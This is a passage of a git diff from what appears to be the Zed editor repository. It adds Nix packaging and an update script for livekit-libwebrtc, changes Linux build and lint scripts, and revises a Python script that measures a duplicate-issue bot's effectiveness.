+ license = lib.licenses.bsd3; + maintainers = with lib.maintainers; [ + WeetHet + niklaskorz + ]; + platforms = lib.platforms.linux ++ lib.platforms.darwin; + }; +} diff --git a/nix/livekit-libwebrtc/sources.json b/nix/livekit-libwebrtc/sources.json new file mode 100644 index 0000000000000000000000000000000000000000..2db785a840f1db0e86a255c5d8c540f5c566ac59 --- /dev/null +++ b/nix/livekit-libwebrtc/sources.json @@ -0,0 +1,372 @@ +{ + "src": { + "args": { + "hash": "sha256-+PgmOZD2Fi+SC66nguixhSwDsoXi4Sz693qOZZrLXm8=", + "owner": "webrtc-sdk", + "repo": "webrtc", + "rev": "624fa1dce239af785fc5fa9ca3b21b9250d3f835" + }, + "fetcher": "fetchFromGitHub" + }, + "src/base": { + "args": { + "hash": "sha256-MTG+pjMPY6/dqeEUy+xJVxPuICETtV98S+h/lFwGItg=", + "rev": "86c814633cf284bc8057a539bc722e2a672afe2f", + "url": "https://chromium.googlesource.com/chromium/src/base" + }, + "fetcher": "fetchFromGitiles" + }, + "src/build": { + "args": { + "hash": "sha256-qFZ12YFX4qxFEHU+VWOG+HDYYPXodgGz+iJ7WEc7cD8=", + "owner": "webrtc-sdk", + "repo": "build", + "rev": "01021e6c12636951a6b4e5342e16b2101b352367" + }, + "fetcher": "fetchFromGitHub" + }, + "src/buildtools": { + "args": { + "hash": "sha256-YWtmMKL1ydueNJ4XM/Pq+8OpqIFe5A6/vYyfZTv7/EI=", + "rev": "0f32cb9025766951122d4ed19aba87a94ded3f43", + "url": "https://chromium.googlesource.com/chromium/src/buildtools" + }, + "fetcher": "fetchFromGitiles" + }, + "src/testing": { + "args": { + "hash": "sha256-s65cABkyMo+FkAmilS67qM3VnrT7iYZg9scycrXzxyE=", + "rev": "a89c37d36bf80c05963727e28b9916835ae88d3a", + "url": "https://chromium.googlesource.com/chromium/src/testing" + }, + "fetcher": "fetchFromGitiles" + }, + "src/third_party": { + "args": { + "hash": "sha256-q+xVOFlpC0vnLMSF9Z6ZRL7mb/cu8jBpsWjDNFFgiKM=", + "rev": "8062e0e102496ff14a8c58b586f014527424953d", + "url": "https://chromium.googlesource.com/chromium/src/third_party" + }, + "fetcher": "fetchFromGitiles" + }, + "src/third_party/boringssl/src": { + "args": { + "hash": "sha256-5Efqc8pLs4ZskXQGpFdTb5cw//v3+DR285m/DsrWSWA=", + "rev": "34492c89a8e381e0e856a686cc71b1eb5bd728db", + "url": "https://boringssl.googlesource.com/boringssl.git" + }, + "fetcher": "fetchFromGitiles" + }, + "src/third_party/breakpad/breakpad": { + "args": { + "hash": "sha256-0ynZuxIqBIpNkfD3Y9XdPFQr7HeQcsUO3lhnqvH+k8c=", + "rev": "232a723f5096ab02d53d87931efa485fa77d3b03", + "url": "https://chromium.googlesource.com/breakpad/breakpad.git" + }, + "fetcher": "fetchFromGitiles" + }, + "src/third_party/catapult": { + "args": { + "hash": "sha256-FIJZE1Qu1MLZA4qxB68k1NjhgSbFTjf57YF85JicVZw=", + "rev": "000f47cfa393d7f9557025a252862e2a61a60d44", + "url": "https://chromium.googlesource.com/catapult.git" + }, + "fetcher": "fetchFromGitiles" + }, + "src/third_party/ced/src": { + "args": { + "hash": "sha256-ySG74Rj2i2c/PltEgHVEDq+N8yd9gZmxNktc56zIUiY=", + "rev": "ba412eaaacd3186085babcd901679a48863c7dd5", + "url": "https://chromium.googlesource.com/external/github.com/google/compact_enc_det.git" + }, + "fetcher": "fetchFromGitiles" + }, + "src/third_party/clang-format/script": { + "args": { + "hash": "sha256-d9uweklBffiuCWEb03ti1eFLnMac2qRtvggzXY1n/RU=", + "rev": "37f6e68a107df43b7d7e044fd36a13cbae3413f2", + "url": "https://chromium.googlesource.com/external/github.com/llvm/llvm-project/clang/tools/clang-format.git" + }, + "fetcher": "fetchFromGitiles" + }, + "src/third_party/colorama/src": { + "args": { + "hash": "sha256-6ZTdPYSHdQOLYMSnE+Tp7PgsVTs3U2awGu9Qb4Rg/tk=", + "rev": "3de9f013df4b470069d03d250224062e8cf15c49", + "url": "https://chromium.googlesource.com/external/colorama.git" + }, + "fetcher": "fetchFromGitiles" + }, + "src/third_party/compiler-rt/src": { + "args": { + "hash": "sha256-yo7BFGgwJNScsXwnCAu8gFBdZVS8/HJplzUk2e73mVg=", + "rev": "57213f125d03209892fed26189feb3b736e96735", + "url": "https://chromium.googlesource.com/external/github.com/llvm/llvm-project/compiler-rt.git" + }, + "fetcher": "fetchFromGitiles" + }, + "src/third_party/crc32c/src": { + "args": { + "hash": "sha256-KBraGaO5LmmPP+p8RuDogGldbTWdNDK+WzF4Q09keuE=", + "rev": "d3d60ac6e0f16780bcfcc825385e1d338801a558", + "url": "https://chromium.googlesource.com/external/github.com/google/crc32c.git" + }, + "fetcher": "fetchFromGitiles" + }, + "src/third_party/dav1d/libdav1d": { + "args": { + "hash": "sha256-+DY4p41VuAlx7NvOfXjWzgEhvtpebjkjbFwSYOzSjv4=", + "rev": "8d956180934f16244bdb58b39175824775125e55", + "url": "https://chromium.googlesource.com/external/github.com/videolan/dav1d.git" + }, + "fetcher": "fetchFromGitiles" + }, + "src/third_party/depot_tools": { + "args": { + "hash": "sha256-DWQyYtpAAGiryeGJzIWlUwY5yn4cNwXY957vlPDUNak=", + "rev": "fa8fc854e1766b86f10c9a15902cf3cc23adaac2", + "url": "https://chromium.googlesource.com/chromium/tools/depot_tools.git" + }, + "fetcher": "fetchFromGitiles" + }, + "src/third_party/ffmpeg": { + "args": { + "hash": "sha256-hNzQZQxaa2Wtl7GWWF852cFmmXy4pc15Pp0d59TTfnI=", + "rev": "01f23648c6b84de6c0f717fa4e1816f53b9ee72e", + "url": "https://chromium.googlesource.com/chromium/third_party/ffmpeg.git" + }, + "fetcher": "fetchFromGitiles" + }, + "src/third_party/flatbuffers/src": { + "args": { + "hash": "sha256-tbc45o0MbMvK5XqRUJt5Eg8BU6+TJqlmwFgQhHq6wRM=", + "rev": "8db59321d9f02cdffa30126654059c7d02f70c32", + "url": "https://chromium.googlesource.com/external/github.com/google/flatbuffers.git" + }, + "fetcher": "fetchFromGitiles" + }, + "src/third_party/fontconfig/src": { + "args": { + "hash": "sha256-W5WIgC6A52kY4fNkbsDEa0o+dfd97Rl5NKfgnIRpI00=", + "rev": "14d466b30a8ab4a9d789977ed94f2c30e7209267", + "url": "https://chromium.googlesource.com/external/fontconfig.git" + }, + "fetcher": "fetchFromGitiles" + }, + "src/third_party/freetype/src": { + "args": { + "hash": "sha256-Vlin6Z+QisUyj6R+TclVOm8x6673YhUIWob9Ih6gzC8=", + "rev": "1da283b8ae6d6b94f34a5c4b8c1227adc9dbb1d8", + "url": "https://chromium.googlesource.com/chromium/src/third_party/freetype2.git" + }, + "fetcher": "fetchFromGitiles" + }, + "src/third_party/fuzztest/src": { + "args": { + "hash": "sha256-L2QG0pUmGjGdtdlivxYfxSqO9YaVHpIT6lvJwBMTxMw=", + "rev": "b10387fdbbca18192f85eaa5323a59f44bf9c468", + "url": "https://chromium.googlesource.com/external/github.com/google/fuzztest.git" + }, + "fetcher": "fetchFromGitiles" + }, + "src/third_party/google_benchmark/src": { + "args": { + "hash": "sha256-cH8s1gP6kCcojAAfTt5iQCVqiAaSooNk4BdaILujM3w=", + "rev": "761305ec3b33abf30e08d50eb829e19a802581cc", + "url": "https://chromium.googlesource.com/external/github.com/google/benchmark.git" + }, + "fetcher": "fetchFromGitiles" + }, + "src/third_party/googletest/src": { + "args": { + "hash": "sha256-QT9PQ9bF+eCPfRLkcHpH4jc0UZfGPc98fHf8QDV5bZg=", + "rev": "cd430b47a54841ec45d64d2377d7cabaf0eba610", + "url": "https://chromium.googlesource.com/external/github.com/google/googletest.git" + }, + "fetcher": "fetchFromGitiles" + }, + "src/third_party/grpc/src": { + "args": { + "hash": "sha256-xivmP36VCSbiMAV3PDUjzCrF+AJzFXJdMe5e2q9yW/k=", + "rev": "957c9f95224b1e1318c0ecb98d0e7584ea5ccff2", + "url": "https://chromium.googlesource.com/external/github.com/grpc/grpc.git" + }, + "fetcher": "fetchFromGitiles" + }, + "src/third_party/gtest-parallel": { + "args": { + "hash": "sha256-VUuk5tBTh+aU2dxVWUF1FePWlKUJaWSiGSXk/J5zgHw=", + "rev": "96f4f904922f9bf66689e749c40f314845baaac8", + "url": "https://chromium.googlesource.com/external/github.com/google/gtest-parallel" + }, + "fetcher": "fetchFromGitiles" + }, + "src/third_party/harfbuzz-ng/src": { + "args": { + "hash": "sha256-lNnCtgIegUy4DLhYaGZXcEaFw83KWAHoKpz69AEsWp4=", + "rev": "9f83bbbe64654b45ba5bb06927ff36c2e7588495", + "url": "https://chromium.googlesource.com/external/github.com/harfbuzz/harfbuzz.git" + }, + "fetcher": "fetchFromGitiles" + }, + "src/third_party/icu": { + "args": { + "hash": "sha256-eGI/6wk6IOUPvX7pRTm4VJk1CqkkxalTu84L36i/D6k=", + "rev": "4c8cc4b365a505ce35be1e0bd488476c5f79805d", + "url": "https://chromium.googlesource.com/chromium/deps/icu.git" + }, + "fetcher": "fetchFromGitiles" + }, + "src/third_party/instrumented_libs": { + "args": { + "hash": "sha256-8kokdsnn5jD9KgM/6g0NuITBbKkGXWEM4BMr1nCrfdU=", + "rev": "69015643b3f68dbd438c010439c59adc52cac808", + "url": "https://chromium.googlesource.com/chromium/third_party/instrumented_libraries.git" + }, + "fetcher": "fetchFromGitiles" + }, + "src/third_party/jsoncpp/source": { + "args": { + "hash": "sha256-bSLNcoYBz3QCt5VuTR056V9mU2PmBuYBa0W6hFg2m8Q=", + "rev": "42e892d96e47b1f6e29844cc705e148ec4856448", + "url": "https://chromium.googlesource.com/external/github.com/open-source-parsers/jsoncpp.git" + }, + "fetcher": "fetchFromGitiles" + }, + "src/third_party/libFuzzer/src": { + "args": { + "hash": "sha256-Lb+HczYax0T7qvC0/Nwhc5l2szQTUYDouWRMD/Qz7sA=", + "rev": "e31b99917861f891308269c36a32363b120126bb", + "url": "https://chromium.googlesource.com/external/github.com/llvm/llvm-project/compiler-rt/lib/fuzzer.git" + }, + "fetcher": "fetchFromGitiles" + }, + "src/third_party/libaom/source/libaom": { + "args": { + "hash": "sha256-ngVZ+xK0b+jKUmawteQ7VFAQzoebX4jqZ3hP9pW+Q0Q=", + "rev": "a23a4799ec2d7dd6e436c7b64a34553773014ed7", + "url": "https://aomedia.googlesource.com/aom.git" + }, + "fetcher": "fetchFromGitiles" + }, + "src/third_party/libc++/src": { + "args": { + "hash": "sha256-lqeuVUgeAKm1pxo+w1vyUbBkBXBzLCQ+Lfu44neKLPo=", + "rev": "917609c669e43edc850eeb192a342434a54e1dfd", + "url": "https://chromium.googlesource.com/external/github.com/llvm/llvm-project/libcxx.git" + }, + "fetcher": "fetchFromGitiles" + }, + "src/third_party/libc++abi/src": { + "args": { + "hash": "sha256-X9cAbyd8ZPSwqOGhPYwIZ6b9E3tVwAuAYZKMgbZQxgk=", + "rev": "f2a7f2987f9dcdf8b04c2d8cd4dcb186641a7c3e", + "url": "https://chromium.googlesource.com/external/github.com/llvm/llvm-project/libcxxabi.git" + }, + "fetcher": "fetchFromGitiles" + }, + "src/third_party/libjpeg_turbo": { + "args": { + "hash": "sha256-Ig+tmprZDvlf/M72/DTar2pbxat9ZElgSqdXdoM0lPs=", + "rev": "e14cbfaa85529d47f9f55b0f104a579c1061f9ad", + "url": "https://chromium.googlesource.com/chromium/deps/libjpeg_turbo.git" + }, + "fetcher": "fetchFromGitiles" + }, + "src/third_party/libsrtp": { + "args": { + "hash": "sha256-bkG1+ss+1a2rCHGwZjhvf5UaNVbPPZJt9HZSIPBKGwM=", + "rev": "a52756acb1c5e133089c798736dd171567df11f5", + "url": "https://chromium.googlesource.com/chromium/deps/libsrtp.git" + }, + "fetcher": "fetchFromGitiles" + }, + "src/third_party/libunwind/src": { + "args": { + "hash": "sha256-XdFKn+cGOxA0fHkVMG9UAhCmpML44ocoyHB7XnumX7o=", + "rev": "81e2cb40a70de2b6978e6d8658891ded9a77f7e3", + "url": "https://chromium.googlesource.com/external/github.com/llvm/llvm-project/libunwind.git" + }, + "fetcher": "fetchFromGitiles" + }, + "src/third_party/libvpx/source/libvpx": { + "args": { + "hash": "sha256-NIGpzP6elcPScHJlZmnPHJdmXsuHcbuELT0C4Ha5PcA=", + "rev": "ff1d193f4b9dfa9b2ced51efbb6ec7a69e58e88c", + "url": "https://chromium.googlesource.com/webm/libvpx.git" + }, + "fetcher": "fetchFromGitiles" + }, + "src/third_party/libyuv": { + "args": { + "hash": "sha256-b/EYCWBQvsNoGhea31DPBKpG8eouf0OBi5TgdHDHs9A=", + "rev": "1e40e34573c3861480d107cd4a4ce290df79951f", + "url": "https://chromium.googlesource.com/libyuv/libyuv.git" + }, + "fetcher": "fetchFromGitiles" + }, + "src/third_party/llvm-libc/src": { + "args": { + "hash": "sha256-yNNx3gOGafMNvZ+aebDKHVj6QM8g0zt0d69PWlWLkyk=", + "rev": "912274164f0877ca917c06e8484ad3be1784833a", + "url": "https://chromium.googlesource.com/external/github.com/llvm/llvm-project/libc.git" + }, + "fetcher": "fetchFromGitiles" + }, + "src/third_party/lss": { + "args": { + "hash": "sha256-rhp4EcZYdgSfu9cqn+zxxGx6v2IW8uX8V+iA0UfZhFY=", + "rev": "ed31caa60f20a4f6569883b2d752ef7522de51e0", + "url": "https://chromium.googlesource.com/linux-syscall-support.git" + }, + "fetcher": "fetchFromGitiles" + }, + "src/third_party/nasm": { + "args": { + "hash": "sha256-neYrS4kQ76ihUh22Q3uPR67Ld8+yerA922YSZU1KxJs=", + "rev": "9f916e90e6fc34ec302573f6ce147e43e33d68ca", + "url": "https://chromium.googlesource.com/chromium/deps/nasm.git" + }, + "fetcher": "fetchFromGitiles" + }, + "src/third_party/openh264/src": { + "args": { + "hash": "sha256-tf0lnxATCkoq+xRti6gK6J47HwioAYWnpEsLGSA5Xdg=", + "rev": "652bdb7719f30b52b08e506645a7322ff1b2cc6f", + "url": "https://chromium.googlesource.com/external/github.com/cisco/openh264" + }, + "fetcher": "fetchFromGitiles" + }, + "src/third_party/perfetto": { + "args": { + "hash": "sha256-I0qiAh3VliVop+3S2/tP6VwCAJOk0Vu7xy8vHJZ1w2A=", + "rev": "a54dd38d60593129ae56d400f1a72860670abea4", + "url": "https://chromium.googlesource.com/external/github.com/google/perfetto.git" + }, + "fetcher": "fetchFromGitiles" + }, + "src/third_party/protobuf-javascript/src": { + "args": { + "hash": "sha256-zq86SrDASl6aYPFPijRZp03hJqXUFz2Al/KkiNq7i0M=", + "rev": "eb785a9363664a402b6336dfe96aad27fb33ffa8", + "url": "https://chromium.googlesource.com/external/github.com/protocolbuffers/protobuf-javascript" + }, + "fetcher": "fetchFromGitiles" + }, + "src/third_party/re2/src": { + "args": { + "hash": "sha256-f/k2rloV2Nwb0KuJGUX4SijFxAx69EXcsXOG4vo+Kis=", + "rev": "c84a140c93352cdabbfb547c531be34515b12228", + "url": "https://chromium.googlesource.com/external/github.com/google/re2.git" + }, + "fetcher": "fetchFromGitiles" + }, + "src/tools": { + "args": { + "hash": "sha256-kZFZl8SC9nZIIOVtNl/5H4huw6BCBsBkJVJ4gaUmly4=", + "rev": "ffcbc837bbb14d80d09147c2af5302ff6bd4bd69", + "url": "https://chromium.googlesource.com/chromium/src/tools" + }, + "fetcher": "fetchFromGitiles" + } +} diff --git a/nix/livekit-libwebrtc/update.sh b/nix/livekit-libwebrtc/update.sh new file mode 100644 index 0000000000000000000000000000000000000000..b28c405b300280b25ab7aa3b85936d0f3ae75878 --- /dev/null +++ b/nix/livekit-libwebrtc/update.sh @@ -0,0 +1,33 @@ +#!/usr/bin/env nix-shell +#!nix-shell -i bash -p gitMinimal curl gojq gclient2nix + +set -eou pipefail +package="livekit-libwebrtc" +pkg_dir="$(dirname "$0")" +nixpkgs="$(git rev-parse --show-toplevel)" + +gh-curl () { + curl --silent ${GITHUB_TOKEN:+-u ":$GITHUB_TOKEN"} "$1" +} + +# Get the current version part before the "-unstable-" for the branch name. +# To manually update to a new major version, you can also invoke the script +# with the new major version, e.g., UPDATE_MAJOR_VERSION=137. +old_version="${UPDATE_NIX_OLD_VERSION:-$(nix-instantiate --eval -E "(import \"$nixpkgs\" { }).$package.version" | tr -d '"')}" +major_version="${UPDATE_MAJOR_VERSION:-${old_version%%-unstable-*}}" +branch="m${major_version}_release" + +# Fetch the current HEAD commit of the release branch +head="$(gh-curl "https://api.github.com/repos/webrtc-sdk/webrtc/git/refs/heads/$branch" | gojq '.object.sha' --raw-output)" +if gojq -e ".src.args.rev == \"$head\"" "$pkg_dir/sources.json"; then + echo "$package is already up-to-date: $head" + exit 0 +fi + +# Get the commit's date for the version field +date="$(gh-curl "https://api.github.com/repos/webrtc-sdk/webrtc/git/commits/$head" | gojq '.committer.date| split("T") | .[0]' --raw-output)" + +echo "Updating sources.json to $head" +gclient2nix generate --root src "https://github.com/webrtc-sdk/webrtc@$head" > "$pkg_dir/sources.json" + +sed -i "s|$old_version|$major_version-unstable-$date|g" "$pkg_dir/package.nix" diff --git a/nix/modules/devshells.nix b/nix/modules/devshells.nix index cfc0e48b871e71d87f9f794b35c16fed714ed4a9..ab58d37fff2dcaa64885effa5526db7bd365586b 100644 --- a/nix/modules/devshells.nix +++ b/nix/modules/devshells.nix @@ -22,10 +22,14 @@ # Cargo build timings wrapper script wrappedCargo = pkgs.writeShellApplication { name = "cargo"; - runtimeInputs = [pkgs.nodejs]; - text = '' - NIX_WRAPPER=1 CARGO=${rustToolchain}/bin/cargo ./script/cargo "$@" - ''; + runtimeInputs = [ pkgs.nodejs ]; + text = + let + pathToCargoScript = ./. + "/../../script/cargo"; + in + '' + NIX_WRAPPER=1 CARGO=${rustToolchain}/bin/cargo ${pathToCargoScript} "$@" + ''; }; in { @@ -34,7 +38,7 @@ inputsFrom = [ zed-editor ]; packages = with pkgs; [ - wrappedCargo # must be first, to shadow the `cargo` provided by `rustToolchain` + wrappedCargo # must be first, to shadow the `cargo` provided by `rustToolchain` rustToolchain # cargo, rustc, and rust-toolchain.toml components included cargo-nextest cargo-hakari diff --git a/nix/toolchain.nix b/nix/toolchain.nix index 6ef22e2a6b06882940c553b2a774f4c6f73e9ea0..2e32f00f6b56570ab9863ab0b5975e603b68f5fa 100644 --- a/nix/toolchain.nix +++ b/nix/toolchain.nix @@ -6,4 +6,5 @@ in pkgs.callPackage ./build.nix { crane = inputs.crane.mkLib pkgs; rustToolchain = rustBin.fromRustupToolchainFile ../rust-toolchain.toml; + commitSha = inputs.self.rev or null; } diff --git a/rust-toolchain.toml b/rust-toolchain.toml index 89b3c648ca2a8a9b893d1b0924697f8170047761..15b4a8f0fc9f93064f08046bcb1edff01e6c6d44 100644 --- a/rust-toolchain.toml +++ b/rust-toolchain.toml @@ -1,5 +1,5 @@ [toolchain] -channel = "1.93" +channel = "1.94.1" profile = "minimal" components = [ "rustfmt", "clippy", "rust-analyzer", "rust-src" ] targets = [ diff --git a/script/bundle-linux b/script/bundle-linux index 4e58ac315bd231fd4ae9208abbc15007abc30631..3487feaf32b9e8258a88a7a1b14c2aafccc37942 100755 --- a/script/bundle-linux +++ b/script/bundle-linux @@ -71,10 +71,18 @@ if "$rustup_installed"; then rustup target add "$remote_server_triple" fi -export CC=$(which clang) +export CC=${CC:-$(which clang)} # Build binary in release mode -export RUSTFLAGS="${RUSTFLAGS:-} -C link-args=-Wl,--disable-new-dtags,-rpath,\$ORIGIN/../lib" +# We need lld to link libwebrtc.a successfully on aarch64-linux. +# NOTE: Since RUSTFLAGS env var overrides all .cargo/config.toml rustflags +# (see https://github.com/rust-lang/cargo/issues/5376), the +# [target.aarch64-unknown-linux-gnu] section in config.toml has no effect here. +if [[ "$(uname -m)" == "aarch64" ]]; then + export RUSTFLAGS="${RUSTFLAGS:-} -C link-arg=-fuse-ld=lld -C link-args=-Wl,--disable-new-dtags,-rpath,\$ORIGIN/../lib" +else + export RUSTFLAGS="${RUSTFLAGS:-} -C link-args=-Wl,--disable-new-dtags,-rpath,\$ORIGIN/../lib" +fi cargo build --release --target "${target_triple}" --package zed --package cli # Build remote_server in separate invocation to prevent feature unification from other crates # from influencing dynamic libraries required by it. @@ -111,10 +119,12 @@ else fi fi -# Strip debug symbols and save them for upload to DigitalOcean -objcopy --strip-debug "${target_dir}/${target_triple}/release/zed" -objcopy --strip-debug "${target_dir}/${target_triple}/release/cli" -objcopy --strip-debug "${target_dir}/${remote_server_triple}/release/remote_server" +# Strip debug symbols and save them for upload to DigitalOcean. +# We use llvm-objcopy because GNU objcopy on older distros (e.g. Ubuntu 20.04) +# doesn't understand CREL sections produced by newer LLVM. +llvm-objcopy --strip-debug "${target_dir}/${target_triple}/release/zed" +llvm-objcopy --strip-debug "${target_dir}/${target_triple}/release/cli" +llvm-objcopy --strip-debug "${target_dir}/${remote_server_triple}/release/remote_server" # Ensure that remote_server does not depend on libssl nor libcrypto, as we got rid of these deps. if ldd "${target_dir}/${remote_server_triple}/release/remote_server" | grep -q 'libcrypto\|libssl'; then diff --git a/script/clippy b/script/clippy index 5c13b0b39cea3937a43ca54de074e5f65fae7c3b..617d99a5623e6406d1dc01247ea2f5b8e5c3b762 100755 --- a/script/clippy +++ b/script/clippy @@ -16,4 +16,8 @@ if [[ -z "${GITHUB_ACTIONS+x}" ]]; then which typos >/dev/null 2>&1 || exit 0 typos --config typos.toml + + which buf >/dev/null 2>&1 || exit 0 + buf lint crates/proto/proto + buf format --diff --exit-code crates/proto/proto fi diff --git a/script/danger/dangerfile.ts b/script/danger/dangerfile.ts index b604a42e45ac7d276a1f278bd2e9727daa98c375..99a29e51d9f287c87d6db3fec7252a28e33b95cc 100644 --- a/script/danger/dangerfile.ts +++ b/script/danger/dangerfile.ts @@ -12,7 +12,7 @@ prHygiene({ }, }); -const RELEASE_NOTES_PATTERN = /Release Notes:\r?\n\s+-/gm; +const RELEASE_NOTES_PATTERN = /Release Notes:(\r?\n)+- /gm; const body = danger.github.pr.body; const hasReleaseNotes = RELEASE_NOTES_PATTERN.test(body); @@ -61,6 +61,25 @@ if (includesIssueUrl) { ); } +const MIGRATION_SCHEMA_FILES = [ + "crates/collab/migrations/20251208000000_test_schema.sql", + "crates/collab/migrations.sqlite/20221109000000_test_schema.sql", +]; + +const modifiedSchemaFiles = danger.git.modified_files.filter((file) => + MIGRATION_SCHEMA_FILES.some((schemaFilePath) => file.endsWith(schemaFilePath)), +); + +if (modifiedSchemaFiles.length > 0) { + warn( + [ + "This PR modifies database schema files.", + "", + "If you are making database changes, a migration needs to be added in the Cloud repository.", + ].join("\n"), + ); +} + const FIXTURE_CHANGE_ATTESTATION = "Changes to test fixtures are intentional and necessary."; const FIXTURES_PATHS = ["crates/assistant_tools/src/edit_agent/evals/fixtures"]; diff --git a/script/docs-suggest-publish b/script/docs-suggest-publish index 23578785159b5fd720e84d3658f7f76dddf3ada9..fc420f3fbc774df0dbd7667a5cd6dd76682e9548 100755 --- a/script/docs-suggest-publish +++ b/script/docs-suggest-publish @@ -131,14 +131,14 @@ if [[ "$DRY_RUN" == "true" ]]; then echo "Would auto-apply suggestions to docs via Droid and create a draft PR." echo "Model: $MODEL" echo "" - + # Show each suggestion file for file in $(echo "$MANIFEST" | jq -r '.suggestions[].file'); do echo "--- $file ---" git show "origin/$SUGGESTIONS_BRANCH:$file" 2>/dev/null || echo "(file not found)" echo "" done - + echo -e "${YELLOW}=== END DRY RUN ===${NC}" echo "" echo "Run without --dry-run to create the PR." @@ -213,7 +213,7 @@ fi FLAGGED_PRS=() FLAGS_FILE="$REPO_ROOT/crates/feature_flags/src/flags.rs" if [[ -f "$FLAGS_FILE" ]]; then - # Extract feature flag struct names (e.g. SubagentsFeatureFlag, GitGraphFeatureFlag) + # Extract feature flag struct names (e.g. SubagentsFeatureFlag) FLAG_NAMES=$(grep -oE 'pub struct \w+FeatureFlag' "$FLAGS_FILE" | awk '{print $3}') if [[ -n "$FLAG_NAMES" ]]; then FLAG_PATTERN=$(echo "$FLAG_NAMES" | tr '\n' '|' | sed 's/|$//') @@ -538,10 +538,10 @@ echo -e "${GREEN}PR created:${NC} $PR_URL" if [[ "$KEEP_QUEUE" != "true" ]]; then echo "" echo "Resetting suggestions queue..." - + git checkout --orphan "${SUGGESTIONS_BRANCH}-reset" git rm -rf . > /dev/null 2>&1 || true - + cat > README.md << 'EOF' # Documentation Suggestions Queue @@ -562,19 +562,19 @@ run `script/docs-suggest-publish` to create a documentation PR from these sugges 3. At preview release, suggestions are collected into a docs PR 4. After docs PR is created, this branch is reset EOF - + mkdir -p suggestions echo '{"suggestions":[]}' > manifest.json git add README.md suggestions manifest.json git commit -m "Reset documentation suggestions queue Previous suggestions published in: $PR_URL" - + # Force push required: replacing the orphan suggestions branch with a clean slate git push -f origin "${SUGGESTIONS_BRANCH}-reset:$SUGGESTIONS_BRANCH" git checkout "$ORIGINAL_BRANCH" git branch -D "${SUGGESTIONS_BRANCH}-reset" - + echo "Suggestions queue reset." else git checkout "$ORIGINAL_BRANCH" diff --git a/script/github-track-duplicate-bot-effectiveness.py b/script/github-track-duplicate-bot-effectiveness.py index ca1ec5a9165bb9264dac1ad3fba7345a12d90f55..05e64026d9538606927da2c7e5cfbf211eb42d2e 100644 --- a/script/github-track-duplicate-bot-effectiveness.py +++ b/script/github-track-duplicate-bot-effectiveness.py @@ -24,6 +24,7 @@ import functools import os import re import sys +from datetime import datetime, timezone import requests @@ -39,10 +40,22 @@ BOT_START_DATE = "2026-02-18" NEEDS_TRIAGE_LABEL = "state:needs triage" DEFAULT_PROJECT_NUMBER = 76 VALID_CLOSED_AS_VALUES = {"duplicate", "not_planned", "completed"} -# Bump this when the duplicate-detection bot's behavior changes in a way that -# could affect outcome rates (e.g. prompt rewrites, model swaps, candidate -# filtering changes). Don't bump for unrelated changes like comment formatting. -BOT_VERSION = "v2" +# Add a new tuple when you deploy a new version of the bot that you want to +# keep track of (e.g. the prompt gets a rewrite or the model gets swapped). +# Newest first, please. The datetime is for the deployment time (merge to maain). +BOT_VERSION_TIMELINE = [ + ("v2", datetime(2026, 2, 26, 14, 9, tzinfo=timezone.utc)), + ("v1", datetime(2026, 2, 18, tzinfo=timezone.utc)), +] + + +def bot_version_for_time(date_string): + """Return the bot version that was active at the given ISO 8601 timestamp.""" + timestamp = datetime.fromisoformat(date_string.replace("Z", "+00:00")) + for version, deployed in BOT_VERSION_TIMELINE: + if timestamp >= deployed: + return version + return BOT_VERSION_TIMELINE[-1][0] def github_api_get(path, params=None): @@ -79,13 +92,14 @@ def fetch_issue(issue_number): "node_id": data["node_id"], "author": (data.get("user") or {}).get("login", ""), "type_name": (data.get("type") or {}).get("name"), + "created_at": data.get("created_at", ""), } -def get_bot_duplicate_comment(issue_number): - """Get the bot's duplicate-detection comment body from an issue. +def get_bot_comment_with_time(issue_number): + """Get the bot's duplicate-detection comment and its timestamp from an issue. - Returns the comment body if found, else None. + Returns {"body": str, "created_at": str} if found, else None. """ comments_path = f"/repos/{REPO_OWNER}/{REPO_NAME}/issues/{issue_number}/comments" page = 1 @@ -94,7 +108,7 @@ def get_bot_duplicate_comment(issue_number): author = (comment.get("user") or {}).get("login", "") body = comment.get("body", "") if author == BOT_LOGIN and body.startswith(BOT_COMMENT_PREFIX): - return body + return {"body": body, "created_at": comment.get("created_at", "")} page += 1 return None @@ -104,8 +118,8 @@ def parse_suggested_issues(comment_body): return [int(match) for match in re.findall(r"^- #(\d+)", comment_body, re.MULTILINE)] -def github_api_graphql(query, variables=None): - """Execute a GitHub GraphQL query. Raises on errors.""" +def github_api_graphql(query, variables=None, partial_errors_ok=False): + """Execute a GitHub GraphQL query. Raises on errors unless partial_errors_ok is set.""" response = requests.post( GRAPHQL_URL, headers=GITHUB_HEADERS, @@ -114,43 +128,51 @@ def github_api_graphql(query, variables=None): response.raise_for_status() data = response.json() if "errors" in data: - raise RuntimeError(f"GraphQL errors: {data['errors']}") + if not partial_errors_ok or "data" not in data: + raise RuntimeError(f"GraphQL errors: {data['errors']}") + print(f" GraphQL partial errors (ignored): {data['errors']}") return data["data"] -def get_closed_as_duplicate_of(issue_number): - """Get the issue number this issue was closed as a duplicate of. +def find_canonical_among(duplicate_number, candidates): + """Check if any candidate issue has duplicate_number marked as a duplicate. - Uses the timeline to find the most recent MarkedAsDuplicateEvent. - Returns the original issue number, or None. + The MarkedAsDuplicateEvent lives on the canonical issue's timeline, not the + duplicate's. So to find which canonical issue our duplicate was closed against, + we check each candidate's timeline for a MarkedAsDuplicateEvent whose + `duplicate` field matches our issue. - Note: not all "closed as duplicate" issues have a MarkedAsDuplicateEvent. - If the closer used the "Close as duplicate" button without separately - marking the duplicate relationship, no event is created and this returns - None. The caller handles this by flagging the item for manual review. + Returns the matching canonical issue number, or None. """ + if not candidates: + return None + data = github_api_graphql( """ - query($owner: String!, $repo: String!, $number: Int!) { + query($owner: String!, $repo: String!, $numbers: [Int!]!) { repository(owner: $owner, name: $repo) { - issue(number: $number) { - timelineItems(last: 10, itemTypes: [MARKED_AS_DUPLICATE_EVENT]) { - nodes { - ... on MarkedAsDuplicateEvent { - canonical { ... on Issue { number } } - } - } - } - } + PLACEHOLDER } } - """, - {"owner": REPO_OWNER, "repo": REPO_NAME, "number": issue_number}, + """.replace("PLACEHOLDER", "\n ".join( + f'issue_{number}: issue(number: {number}) {{' + f' timelineItems(last: 50, itemTypes: [MARKED_AS_DUPLICATE_EVENT]) {{' + f' nodes {{ ... on MarkedAsDuplicateEvent {{ duplicate {{ ... on Issue {{ number }} }} }} }} }} }}' + for number in candidates + )), + {"owner": REPO_OWNER, "repo": REPO_NAME, "numbers": list(candidates)}, + partial_errors_ok=True, ) - nodes = data["repository"]["issue"]["timelineItems"]["nodes"] - for node in reversed(nodes): - if original := (node.get("canonical") or 